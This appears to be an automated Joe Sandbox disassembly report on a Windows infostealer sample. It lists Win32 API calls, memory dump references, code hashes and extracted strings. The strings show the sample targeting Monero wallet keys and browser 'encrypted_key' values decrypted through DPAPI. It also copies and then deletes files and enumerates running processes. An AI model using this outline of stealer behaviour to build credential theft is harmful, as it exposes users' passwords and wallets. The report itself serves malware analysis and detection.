                                  • Opcode ID: 7249c4839d1ef7a1fdc1491fadd00847cd1df903587e2939abc8c85ea42feda2
                                  • Instruction ID: 13d6d0fd9ff9fcf23219f062984b299a4c6de81f0aecb64773d635ae3c3b8dbe
                                  • Opcode Fuzzy Hash: 7249c4839d1ef7a1fdc1491fadd00847cd1df903587e2939abc8c85ea42feda2
                                  • Instruction Fuzzy Hash: CBE0ECB5A44309BBDB28DBD4DD0AE6D77B8EB05701F0001A4FD0997384DA719E50DB91
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6AA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00E6AB2F
                                  • lstrlen.KERNEL32(00000000), ref: 00E6ADEC
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6AE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: d7028944152588137a77366d0e5d115e746c823b545bb15b41d7f98644e59d26
                                  • Instruction ID: 3b7d44de3dedaae0f8e0af722eda0acc02359001beb618755fd8bb4e3a6064be
                                  • Opcode Fuzzy Hash: d7028944152588137a77366d0e5d115e746c823b545bb15b41d7f98644e59d26
                                  • Instruction Fuzzy Hash: 4AE1E3729101089BCB15FBA4DDA2EEEB37DAF54300F54D5B9F11A72095EF306A48CB62
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D581
                                  • lstrlen.KERNEL32(00000000), ref: 00E6D798
                                  • lstrlen.KERNEL32(00000000), ref: 00E6D7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6D82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: a568c0ab77a1f0726ff345b871ad7dbe130ea7dff7f97e87fb10ec78099bfcb5
                                  • Instruction ID: f2334f906c01bd9d1ab264ce581eeb6d819c39955828dc8988924d1c300d5f15
                                  • Opcode Fuzzy Hash: a568c0ab77a1f0726ff345b871ad7dbe130ea7dff7f97e87fb10ec78099bfcb5
                                  • Instruction Fuzzy Hash: B39108729101089BCB15FBA4DC62DEE73B9AF94300F54D579F11A76095EF306A48CB62
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D901
                                  • lstrlen.KERNEL32(00000000), ref: 00E6DA9F
                                  • lstrlen.KERNEL32(00000000), ref: 00E6DAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6DB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e62697ade43560916cbca16da24bfaee8575d981b1078c6ce85c6cac0d0d8384
                                  • Instruction ID: dd1eef97514c961d146b648bc9ece0eed24e68c1c8446e109cd8aaf140741c8f
                                  • Opcode Fuzzy Hash: e62697ade43560916cbca16da24bfaee8575d981b1078c6ce85c6cac0d0d8384
                                  • Instruction Fuzzy Hash: 73811772910108ABCB14FBA4DCA6DEE73BDAF94304F549578F11A76095EF306A48CB72
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: 6fb1a6e2bdd8bd4985b097abb5455dadc68d10cfc956ed08ed2cd025476e39d5
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: A351E47260024AAFEB29CF55C841BBA73A5FF01304F24692EE80677791E771ED82D790
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E6A664
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 19c41a8f4c43122e7e95cc3046645390edb694dac9bd410fdabef0f8555751f7
                                  • Instruction ID: 95ad270ecddd4e8fba203195223dd896bf4d26b0141fa68b4d1ea46e2832e2a0
                                  • Opcode Fuzzy Hash: 19c41a8f4c43122e7e95cc3046645390edb694dac9bd410fdabef0f8555751f7
                                  • Instruction Fuzzy Hash: 0D513D70A50208EFDB24EFA4DD96FED77B5AF40344F08A128E90E7B191EB706A05CB51
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E81678,00E80D93), ref: 00E6F64C
                                  • lstrlen.KERNEL32(00000000), ref: 00E6F66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 5509aa2dec4bd4d71fc697441bfbb952f202261660514db14aa67b825d2efdb5
                                  • Instruction ID: 1f4ca789bd936f2563581945b71d3e6b299dc396c7d22e1a740cc0c0d6dc01de
                                  • Opcode Fuzzy Hash: 5509aa2dec4bd4d71fc697441bfbb952f202261660514db14aa67b825d2efdb5
                                  • Instruction Fuzzy Hash: 8F511072D101089BCB04FBA4EDA6DED73B9AF94340F58D578F41A77191EE346A08CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 2d895b704595e2d24c22abe78edccf995174d487d4e2cb7233c9442289fca487
                                  • Instruction ID: 89087e1a425851b129d56feba495abaa67a54de387f3893000568110aa74a825
                                  • Opcode Fuzzy Hash: 2d895b704595e2d24c22abe78edccf995174d487d4e2cb7233c9442289fca487
                                  • Instruction Fuzzy Hash: 83416371D002099FDB54EFB4D955AEEB7B8AF44304F04D028F51A77185EB709A48DF91
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E6A489
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                    • Part of subcall function 00E6A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                    • Part of subcall function 00E6A210: LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                    • Part of subcall function 00E6A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E6A2D4
                                    • Part of subcall function 00E6A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E6A2F3
                                    • Part of subcall function 00E6A2B0: LocalFree.KERNEL32(?), ref: 00E6A323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 20a72e0ac7036d1aa424466c9901fdb3ba9bea4de300462f6d527b92e21305a0
                                  • Instruction ID: e0e3830db09a23f3a61918c5f52b189a0bcd41bf6c1185b2c6ed643a69f6b24d
                                  • Opcode Fuzzy Hash: 20a72e0ac7036d1aa424466c9901fdb3ba9bea4de300462f6d527b92e21305a0
                                  • Instruction Fuzzy Hash: 1F3132B6D402099BCF14DBD4ED45AEEB7B8AB58344F085568E906B3241F7309E05CBA2
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E805BF), ref: 00E7885A
                                  • Process32First.KERNEL32(?,00000128), ref: 00E7886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00E78883
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • CloseHandle.KERNEL32(?), ref: 00E788F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
